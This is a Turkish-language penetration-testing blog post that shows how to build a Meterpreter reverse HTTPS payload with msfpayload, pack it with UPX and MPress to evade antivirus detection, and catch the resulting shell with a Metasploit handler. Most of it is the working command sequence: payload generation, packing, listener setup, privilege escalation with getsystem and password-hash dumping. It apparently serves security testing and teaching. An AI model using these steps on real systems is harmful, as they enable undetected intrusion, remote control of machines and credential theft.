UPX ve MPress Dosya Sıkıştırma Uygulamaları Kullanılarak Zararlı Yazılım Oluşturma

0
907
views
Sızma testleri sırasında antivirüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır. Bu yazıda, Metasploit tarafından sağlanan msfpayload modülü kullanılarak hazırlanan exe uygulama dosyası UPX ve Mpress dosya sıkıştırma programları ile sıkıştırılacak, sonrasında da antivirüslere yakalanmayan zararlı uygulamalar oluşturulacaktır.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Dosya sıkıştırma uygulamaları, aslında çalıştırılabilir dosya üzerinde sıkıştırma işlemi gerçekleştirip dosyanın işlevini değiştirmeyen sadece görünümünü değiştiren yazılımlardır. Normal sıkıştırıcılardan (zip, winrar) farklı olarak dosyanın nasıl açılıp yorumlanacağı yeni oluşturulan paketlenmiş dosyanın içerisinde yer alır. Bu yüzden yeni oluşturulan dosyalara kendi başına açılabilir arşiv (self-extracting archive) denilmektedir. Dosya sıkıştırma uygulamalarının, sıkıştırma ve antivirüslerden gizlenme gibi kullanımlarının yanında diğer bir kullanım amacı da tersine mühendislik yapmayı zorlaştırarak yazılımların kaynak kodunun elde edilmesini zorlaştırmaktır.

Dosya sıkıştırma uygulamaları, analiz işini zorlaştırmak için aşağıdaki özellikleri kullanabilirler:

  • Sıkıştırma
  • Şifreleme
  • Tersine mühendislik yöntemlerini zorlaştıran metotlar

Bu yazıda dosya sıkılaştırma uygulamaları ile MsfPayload ile oluşturulan zararlı bir yazılım UPX ve Mpress adlı sıkıştırma araçlarıyla yeniden paketlenecektir.

Metasploit kullanılarak oluşturulan bir payload aşağıdaki gibi gerçekleştirilebilir:

msfpayload windows/meterpreter/reverse_https LHOST=192.168.2.48 LPORT=443 > Uygulama1.exe

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-01

Bu uygulama 36 AV tarafından tespit edilmiştir.

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-02

Kali üzerindeki UPX adlı sıkılaştırma aracı ile aynı uygulamanın sıkılaştırılmış hali oluşturulabilir:

upx -9qf -oUygulama2.exe Uygulama1.exe

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-03

Sıkıştırılmış dosyanın 37 AV tarafından tespit edilmiştir.

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-04

Mpress ile sıkıştırma işlemi aşağıdaki gibidir:

mpress.exe Uygulama1.exe

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-05

Sıkıştırılmış dosyanın 30 AV tarafından tespit edilmiştir.

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-06

Mpress gibi çok fazla yaygınlaşmamış paketleyicilerin kullanılması AV’ler tarafından tespit edilme oranını azaltacaktır.

Oluşturulan uygulamanın işlevselliğinde bir değişiklik olmamaktadır. Aşağıdaki komutlar sonrasında uygulama çalıştırılınca ters HTTPS bağlantısı kurulmaktadır.

msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set LHOST 192.168.2.48
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit -j
msf exploit(handler) > sessions -i 1
meterpreter > getsystem
meterpreter > hashdump
meterpreter > run hashdump

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-07

 

Kaynaklar:

http://en.wikipedia.org/wiki/Executable_compression
http://www.matcode.com/mpress.htm
https://www.bilgiguvenligi.gov.tr/zararli-yazilimlar/paketleyiciler-packers-calistirilabilir-sikistiricilar.html

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.